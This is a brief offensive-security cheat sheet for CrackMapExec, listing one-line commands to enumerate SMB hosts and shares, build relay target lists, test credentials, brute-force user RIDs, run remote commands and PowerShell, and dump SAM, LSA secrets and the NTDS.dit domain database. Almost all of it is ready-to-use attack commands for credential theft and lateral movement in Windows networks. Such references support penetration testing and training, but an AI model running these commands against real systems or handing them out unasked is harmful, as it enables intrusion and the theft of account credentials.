CrackMapExec
Find ip/hostname/SMB Signinig/etc:
crackmapexec smb targets.txtGenerate a list of SMB Signing disabled for relays
crackmapexec smb targets.txt --gen-relay-list relay.txtFind hosts user can log into/is admin on
crackmapexec smb targets.txt -u user -p 'password'Enumerate shares
crackmapexec smb ip -u user -p 'password' --sharesDump SAM
crackmapexec smb ip -u user -p 'password' --samDump LSA
crackmapexec smb ip -u user -p 'password' --lsaPass cmd
crackmapexec smb ip -u user -p 'password' -x 'command'Pass powershell
crackmapexec smb ip -u user -p 'password' -X 'command'List users if Guest account is enabled
crackmapexec smb (ip) -u 'Guest' -p '' --rid-bruteLook at domain admins
crackmapexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'Look at logged on users
crackmapexec smb ip -u user -p 'password' --loggedon-usersLook at NTDS.dit - is LOUD - USE WITH CAUTION
crackmapexec smb dc-ip -u domain-admin-user -p 'password' --ntdsLast updated